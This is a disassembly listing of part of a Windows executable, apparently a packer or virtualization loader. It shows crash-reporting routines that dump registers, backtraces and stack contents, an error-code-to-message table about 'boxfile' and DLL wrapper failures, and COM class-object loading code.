mov eax, [ebp+var_48]
mov al, [eax]
mov [ebp+var_49], al
mov ecx, [ebp+var_44]
cmp al, [ecx]
jnz short loc_508BD2
cmp [ebp+var_49], 0
jz short loc_508BCC
mov eax, [ebp+var_48]
mov al, [eax+1]
mov [ebp+var_4A], al
mov ecx, [ebp+var_44]
cmp al, [ecx+1]
jnz short loc_508BD2
add [ebp+var_48], 2
add [ebp+var_44], 2
cmp [ebp+var_4A], 0
jnz short loc_508B98
loc_508BCC: ; CODE XREF: sub_508A16+195�j
and [ebp+var_50], 0
jmp short loc_508BDA
; ---------------------------------------------------------------------------
loc_508BD2: ; CODE XREF: sub_508A16+18F�j
; sub_508A16+1A6�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_50], eax
loc_508BDA: ; CODE XREF: sub_508A16+1BA�j
mov eax, [ebp+var_50]
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_508BF5
mov eax, [ebp+var_30]
mov [ebp+var_58], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_58]
jmp short loc_508C08
; ---------------------------------------------------------------------------
loc_508BF5: ; CODE XREF: sub_508A16+30�j
; sub_508A16+6F�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_508C06
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_508C06: ; CODE XREF: sub_508A16+1E3�j
xor eax, eax
loc_508C08: ; CODE XREF: sub_508A16+1DD�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_508A16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508C17 proc near ; CODE XREF: sub_4FD2E0+3F8�p
push ebp
mov ebp, esp
push offset sub_508C27
call ds:dword_511790 ; SetUnhandledExceptionFilter
pop ebp
retn
sub_508C17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508C27 proc near ; CODE XREF: sub_505BD7+367�p
; sub_506B7F+3�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax]
push dword ptr [eax]
push offset a__seh__0xXAt0x ; "__SEH__ 0x%x at 0x%x"
call sub_508726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+98h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0BCh]
push offset aCs0x08xSs0x08x ; "CS :0x%08X SS :0x%08X DS :0x%08X"
call sub_508726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+8Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+90h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+94h]
push offset aEs0x08xFs0x08x ; "ES :0x%08X FS :0x%08X GS :0x%08X"
call sub_508726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0ACh]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B0h]
push offset aEax0x08xEdx0x0 ; "EAX:0x%08X EDX:0x%08X ECX:0x%08X"
call sub_508726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
push offset aEsp0x08xEbp0x0 ; "ESP:0x%08X EBP:0x%08X EIP:0x%08X"
call sub_508726
add esp, 10h
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+9Ch]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0A0h]
push offset aEsi0x08xEdi0x0 ; "ESI:0x%08X EDI:0x%08X"
call sub_508726
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0C4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B4h]
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push dword ptr [eax+0B8h]
call sub_50918E
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, 11000000h
mov [ebp+var_8], eax
cmp [ebp+var_8], 16h
ja loc_508E67
mov eax, [ebp+var_8]
jmp ds:off_508E97[eax*4]
loc_508D8E: ; DATA XREF: _5:off_508E97�o
mov [ebp+var_4], offset aAssertionFai_1 ; "ASSERTION FAILED"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508D9A: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508E9B�o
mov [ebp+var_4], offset aHasNoAccessToE ; "HAS NO ACCESS TO EXECUTABLE"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DA6: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508E9F�o
mov [ebp+var_4], offset aExecutableIsNo ; "EXECUTABLE IS NOT NT IMAGE"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DB2: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EC7�o
mov [ebp+var_4], offset aDynamicLibrary ; "DYNAMIC LIBRARY IS NOT NT IMAGE"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DBE: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EA3�o
mov [ebp+var_4], offset aExecutableCorr ; "EXECUTABLE CORRUPTED"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DCA: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EA7�o
mov [ebp+var_4], offset aPathIsVeryLong ; "PATH IS VERY LONG"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DD6: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EAB�o
mov [ebp+var_4], offset aCouldNotOpenBo ; "COULD NOT OPEN BOXFILE"
jmp loc_508E67
; ---------------------------------------------------------------------------
loc_508DE2: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EAF�o
mov [ebp+var_4], offset aReadBoxfileErr ; "READ BOXFILE ERROR"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508DEB: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EB3�o
mov [ebp+var_4], offset aBoxfileCorrupt ; "BOXFILE CORRUPTED"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508DF4: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EB7�o
mov [ebp+var_4], offset aFeatureIsNotIm ; "FEATURE IS NOT IMPLEMENTED"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508DFD: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EBB�o
mov [ebp+var_4], offset aOutOfMemory ; "OUT OF MEMORY"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E06: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EBF�o
mov [ebp+var_4], offset aWrappersTableB ; "WRAPPERS TABLE BROKEN"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E0F: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EC3�o
mov [ebp+var_4], offset aVirtualprote_0 ; "VIRTUALPROTECT BROKEN"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E18: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508ECB�o
mov [ebp+var_4], offset aCouldNotCreate ; "COULD NOT CREATE HEAP"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E21: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508ECF�o
mov [ebp+var_4], offset aHeapCorrupted ; "HEAP CORRUPTED"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E2A: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508ED7�o
mov [ebp+var_4], offset aDllCorrupted ; "DLL CORRUPTED"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E33: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EE7�o
mov [ebp+var_4], offset aInvalidCompres ; "INVALID COMPRESSION/ENCRYPTION ALGORITH"...
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E3C: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508ED3�o
mov [ebp+var_4], offset aPackedDllOrBox ; "PACKED DLL OR BOXFILE CORRUPTED"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E45: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EDB�o
mov [ebp+var_4], offset aHookingDllErro ; "HOOKING DLL ERROR"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E4E: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EDF�o
mov [ebp+var_4], offset aGetmodulenameE ; "GetModuleName ERROR"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E57: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EE3�o
mov [ebp+var_4], offset aBadFuulname ; "BAD FUULNAME"
jmp short loc_508E67
; ---------------------------------------------------------------------------
loc_508E60: ; CODE XREF: sub_508C27+160�j
; DATA XREF: _5:00508EEF�o
mov [ebp+var_4], offset aInvalidDllRelo ; "INVALID DLL RELOCATION"
loc_508E67: ; CODE XREF: sub_508C27+157�j
; sub_508C27+160�j ...
cmp [ebp+var_4], 0
jz short loc_508E8C
push 0
push 0
call ds:dword_5117C4 ; ChangeDisplaySettingsA
push 10h
push ds:off_50E4F4
push [ebp+var_4]
push 0
call ds:dword_5117D0 ; MessageBoxA
jmp short loc_508E90
; ---------------------------------------------------------------------------
loc_508E8C: ; CODE XREF: sub_508C27+244�j
xor eax, eax
jmp short locret_508E93
; ---------------------------------------------------------------------------
loc_508E90: ; CODE XREF: sub_508C27+263�j
push 1
pop eax
locret_508E93: ; CODE XREF: sub_508C27+267�j
leave
retn 4
sub_508C27 endp
; ---------------------------------------------------------------------------
off_508E97 dd offset loc_508D8E ; DATA XREF: sub_508C27+160�r
dd offset loc_508D9A
dd offset loc_508DA6
dd offset loc_508DBE
dd offset loc_508DCA
dd offset loc_508DD6
dd offset loc_508DE2
dd offset loc_508DEB
dd offset loc_508DF4
dd offset loc_508DFD
dd offset loc_508E06
dd offset loc_508E0F
dd offset loc_508DB2
dd offset loc_508E18
dd offset loc_508E21
dd offset loc_508E3C
dd offset loc_508E2A
dd offset loc_508E45
dd offset loc_508E4E
dd offset loc_508E57
dd offset loc_508E33
dd offset loc_508E67
dd offset loc_508E60
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_508EF3 proc near ; CODE XREF: sub_50918E+40�p
; sub_50918E+83�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E550
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, offset dword_515A90
test eax, eax
jnz short loc_508F2E
mov eax, offset aBroken ; "!broken!"
jmp loc_509006
; ---------------------------------------------------------------------------
loc_508F2E: ; CODE XREF: sub_508EF3+2F�j
mov ecx, 100h
xor eax, eax
mov edi, offset dword_515A90
rep stosd
and [ebp+var_4], 0
push 1Ch
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call ds:dword_5117B0 ; VirtualQuery
test eax, eax
jnz short loc_508F78
push offset a0x08xUnknownUn ; "0x%08x:[unknown]:unknown"
push offset dword_515A90
call ds:dword_5117D4 ; wsprintfA
pop ecx
pop ecx
mov [ebp+var_44], offset dword_515A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_44]
jmp loc_509006
; ---------------------------------------------------------------------------
loc_508F78: ; CODE XREF: sub_508EF3+5E�j
lea eax, [ebp+var_40]
push eax
call sub_5090EF
pop ecx
mov [ebp+var_20], eax
and [ebp+var_24], 0
and [ebp+var_1C], 0
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_40]
push eax
push [ebp+arg_0]
call sub_509015
add esp, 10h
cmp [ebp+var_20], 0
jnz short loc_508FB1
mov [ebp+var_20], offset aUnknown_0 ; "unknown"
loc_508FB1: ; CODE XREF: sub_508EF3+B5�j
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+var_20]
push [ebp+arg_0]
push offset a0x08xS03x08x ; "0x%08x:[%s]:(%03x:%08x)"
push offset dword_515A90
call ds:dword_5117D4 ; wsprintfA
add esp, 18h
mov [ebp+var_48], offset dword_515A90
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_48]
jmp short loc_509006
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
push [ebp+arg_0]
push offset aBroken0x08x ; "!broken!0x%08x:"
push offset dword_515A90
call ds:dword_5117D4 ; wsprintfA
add esp, 0Ch
mov eax, offset dword_515A90
loc_509006: ; CODE XREF: sub_508EF3+36�j
; sub_508EF3+80�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_508EF3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509015 proc near ; CODE XREF: sub_508EF3+A9�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov ecx, [ecx+4]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+4]
mov [ebp+var_C], ecx
and [ebp+var_4], 0
jmp short loc_509058
; ---------------------------------------------------------------------------
loc_509051: ; CODE XREF: sub_509015:loc_5090E5�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_509058: ; CODE XREF: sub_509015+3A�j
mov eax, [ebp+var_10]
movzx eax, word ptr [eax+6]
cmp [ebp+var_4], eax
jnb loc_5090EA
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+0Ch]
mov [ebp+var_18], eax
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_4]
imul ecx, 28h
mov edx, [ebp+var_8]
mov esi, [ebp+var_8]
mov eax, [edx+eax+10h]
cmp eax, [esi+ecx+8]
jbe short loc_5090A6
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+10h]
mov [ebp+var_1C], eax
jmp short loc_5090B6
; ---------------------------------------------------------------------------
loc_5090A6: ; CODE XREF: sub_509015+7D�j
mov eax, [ebp+var_4]
imul eax, 28h
mov ecx, [ebp+var_8]
mov eax, [ecx+eax+8]
mov [ebp+var_1C], eax
loc_5090B6: ; CODE XREF: sub_509015+8F�j
mov eax, [ebp+var_18]
add eax, [ebp+var_1C]
mov [ebp+var_14], eax
mov eax, [ebp+var_C]
cmp eax, [ebp+var_18]
jb short loc_5090E5
mov eax, [ebp+var_C]
cmp eax, [ebp+var_14]
jnb short loc_5090E5
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_8]
mov [ecx], eax
mov eax, [ebp+var_C]
sub eax, [ebp+var_18]
mov ecx, [ebp+arg_C]
mov [ecx], eax
jmp short loc_5090EA
; ---------------------------------------------------------------------------
loc_5090E5: ; CODE XREF: sub_509015+B0�j
; sub_509015+B8�j
jmp loc_509051
; ---------------------------------------------------------------------------
loc_5090EA: ; CODE XREF: sub_509015+4D�j
; sub_509015+CE�j
xor al, al
pop esi
leave
retn
sub_509015 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5090EF proc near ; CODE XREF: sub_508EF3+89�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push edi
push 41h
pop ecx
xor eax, eax
mov edi, offset dword_515E90
rep stosd
push 104h
push offset dword_515E90
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
call ds:dword_511714 ; GetModuleFileNameA
test eax, eax
jnz short loc_50911F
xor eax, eax
jmp short loc_50918B
; ---------------------------------------------------------------------------
loc_50911F: ; CODE XREF: sub_5090EF+2A�j
push 5Ch
push offset dword_515E90
call sub_4FC700
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_50913C
mov eax, [ebp+var_4]
inc eax
jmp short loc_50918B
; ---------------------------------------------------------------------------
loc_50913C: ; CODE XREF: sub_5090EF+45�j
mov edi, offset dword_515E90
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
push 50h
pop eax
cmp eax, ecx
sbb eax, eax
neg eax
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_509186
mov eax, [ebp+var_8]
mov ds:byte_515E40[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_515E41[eax], 2Eh
mov eax, [ebp+var_8]
mov ds:byte_515E42[eax], 2Eh
mov eax, [ebp+var_8]
lea eax, byte_515E40[eax]
jmp short loc_50918B
; ---------------------------------------------------------------------------
loc_509186: ; CODE XREF: sub_5090EF+6C�j
mov eax, offset dword_515E90
loc_50918B: ; CODE XREF: sub_5090EF+2E�j
; sub_5090EF+4B�j ...
pop edi
leave
retn
sub_5090EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50918E proc near ; CODE XREF: sub_508C27+132�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E560
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
push offset aBacktrace ; "-- backtrace --"
call sub_508726
pop ecx
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_508EF3
pop ecx
push eax
push offset aS_32 ; " %s"
call sub_508726
pop ecx
pop ecx
and [ebp+var_20], 0
jmp short loc_5091F6
; ---------------------------------------------------------------------------
loc_5091E7: ; CODE XREF: sub_50918E+96�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+var_1C]
mov eax, [eax]
mov [ebp+var_1C], eax
loc_5091F6: ; CODE XREF: sub_50918E+57�j
cmp [ebp+var_20], 40h
jnb short loc_509226
cmp [ebp+var_1C], 0
jz short loc_509226
mov eax, [ebp+var_1C]
cmp dword ptr [eax+4], 0
jz short loc_509226
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
call sub_508EF3
pop ecx
push eax
push offset aS_32 ; " %s"
call sub_508726
pop ecx
pop ecx
jmp short loc_5091E7
; ---------------------------------------------------------------------------
loc_509226: ; CODE XREF: sub_50918E+6C�j
; sub_50918E+72�j ...
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_509242
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_508726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_509242: ; CODE XREF: sub_50918E+9C�j
push offset aStack ; "--stack--"
call sub_508726
pop ecx
mov eax, [ebp+arg_8]
mov [ebp+var_1C], eax
mov [ebp+var_4], 1
and [ebp+var_24], 0
jmp short loc_509267
; ---------------------------------------------------------------------------
loc_509260: ; CODE XREF: sub_50918E+10F�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_509267: ; CODE XREF: sub_50918E+D0�j
cmp [ebp+var_24], 8
jnb short loc_50929F
mov eax, [ebp+var_1C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_1C]
push dword ptr [eax+8]
mov eax, [ebp+var_1C]
push dword ptr [eax+4]
mov eax, [ebp+var_1C]
push dword ptr [eax]
push [ebp+var_1C]
push offset a0x08x0x08x0x08 ; "0x%08x: 0x%08x 0x%08x 0x%08x 0x%08x"
call sub_508726
add esp, 18h
mov eax, [ebp+var_1C]
add eax, 10h
mov [ebp+var_1C], eax
jmp short loc_509260
; ---------------------------------------------------------------------------
loc_50929F: ; CODE XREF: sub_50918E+DD�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_5092BB
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
push offset a___OpssBrokenB ; " ... opss, broken by SEH"
call sub_508726
pop ecx
or [ebp+var_4], 0FFFFFFFFh
loc_5092BB: ; CODE XREF: sub_50918E+115�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_50918E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5092CA proc near ; CODE XREF: sub_4FF63E+64�p
; sub_50153F+2AF�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
and [ebp+var_8], 0
mov edi, [ebp+arg_0]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+1]
push eax
call sub_50835A
pop ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
inc ecx
mov esi, [ebp+arg_0]
mov edi, [ebp+var_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_5092CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50931F proc near ; CODE XREF: sub_5093B3+1F�p
; sub_5098C0+40�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jnz short loc_509336
mov eax, 80004005h
jmp short locret_5093B1
; ---------------------------------------------------------------------------
loc_509336: ; CODE XREF: sub_50931F+E�j
push [ebp+arg_0]
call sub_502D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_5093AC
push 8
pop edx
mov ecx, [ebp+var_4]
call sub_5061E1
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_50936C
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_5093B1
; ---------------------------------------------------------------------------
loc_50936C: ; CODE XREF: sub_50931F+3B�j
and [ebp+var_C], 0
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+var_8]
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_509397
mov eax, [ebp+arg_14]
mov dword ptr [eax], 80004005h
mov eax, 80004005h
jmp short locret_5093B1
; ---------------------------------------------------------------------------
loc_509397: ; CODE XREF: sub_50931F+66�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call [ebp+var_C]
mov ecx, [ebp+arg_14]
mov [ecx], eax
xor eax, eax
jmp short locret_5093B1
; ---------------------------------------------------------------------------
loc_5093AC: ; CODE XREF: sub_50931F+27�j
mov eax, 80004005h
locret_5093B1: ; CODE XREF: sub_50931F+15�j
; sub_50931F+4B�j ...
leave
retn
sub_50931F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5093B3 proc near ; CODE XREF: sub_509518+53�p
; sub_509789+43�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 1Ch
and [ebp+var_4], 0
push [ebp+arg_18]
lea eax, [ebp+var_4]
push eax
push offset dword_5111D8
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_0]
call sub_50931F
add esp, 18h
test eax, eax
jl loc_509511
mov eax, [ebp+arg_18]
cmp dword ptr [eax], 0
jge short loc_5093F4
mov eax, [ebp+arg_18]
mov eax, [eax]
jmp locret_509516
; ---------------------------------------------------------------------------
loc_5093F4: ; CODE XREF: sub_5093B3+35�j
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_14], 0
and [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push offset dword_5111C8
push [ebp+arg_4]
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+0Ch]
test eax, eax
jl loc_5094BB
and [ebp+var_18], 0
jmp short loc_509430
; ---------------------------------------------------------------------------
loc_509429: ; CODE XREF: sub_5093B3+F8�j
mov eax, [ebp+var_18]
inc eax
mov [ebp+var_18], eax
loc_509430: ; CODE XREF: sub_5093B3+74�j
mov eax, [ebp+var_18]
cmp eax, [ebp+arg_10]
jnb short loc_5094B0
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
lea eax, [ecx+eax+4]
push eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
push dword ptr [ecx+eax]
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax]
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+arg_14]
mov [edx+ecx+8], eax
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 0
jl short loc_50947F
mov [ebp+var_C], 1
jmp short loc_50949C
; ---------------------------------------------------------------------------
loc_50947F: ; CODE XREF: sub_5093B3+C4�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
cmp dword ptr [ecx+eax+8], 80004002h
jnz short loc_509498
mov [ebp+var_10], 1
jmp short loc_50949C
; ---------------------------------------------------------------------------
loc_509498: ; CODE XREF: sub_5093B3+DD�j
mov [ebp+var_14], 1
loc_50949C: ; CODE XREF: sub_5093B3+CA�j
; sub_5093B3+E3�j
mov eax, [ebp+var_18]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_1C], eax
jmp loc_509429
; ---------------------------------------------------------------------------
loc_5094B0: ; CODE XREF: sub_5093B3+83�j
mov eax, [ebp+var_8]
mov eax, [eax]
push [ebp+var_8]
call dword ptr [eax+8]
loc_5094BB: ; CODE XREF: sub_5093B3+6A�j
movzx eax, [ebp+var_14]
test eax, eax
jz short loc_5094CE
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004005h
jmp short loc_509502
; ---------------------------------------------------------------------------
loc_5094CE: ; CODE XREF: sub_5093B3+10E�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_5094E9
movzx eax, [ebp+var_10]
test eax, eax
jz short loc_5094E9
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80012h
jmp short loc_509502
; ---------------------------------------------------------------------------
loc_5094E9: ; CODE XREF: sub_5093B3+121�j
; sub_5093B3+129�j
movzx eax, [ebp+var_C]
test eax, eax
jz short loc_5094F9
mov eax, [ebp+arg_18]
and dword ptr [eax], 0
jmp short loc_509502
; ---------------------------------------------------------------------------
loc_5094F9: ; CODE XREF: sub_5093B3+13C�j
mov eax, [ebp+arg_18]
mov dword ptr [eax], 80004002h
loc_509502: ; CODE XREF: sub_5093B3+119�j
; sub_5093B3+134�j ...
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
xor eax, eax
jmp short locret_509516
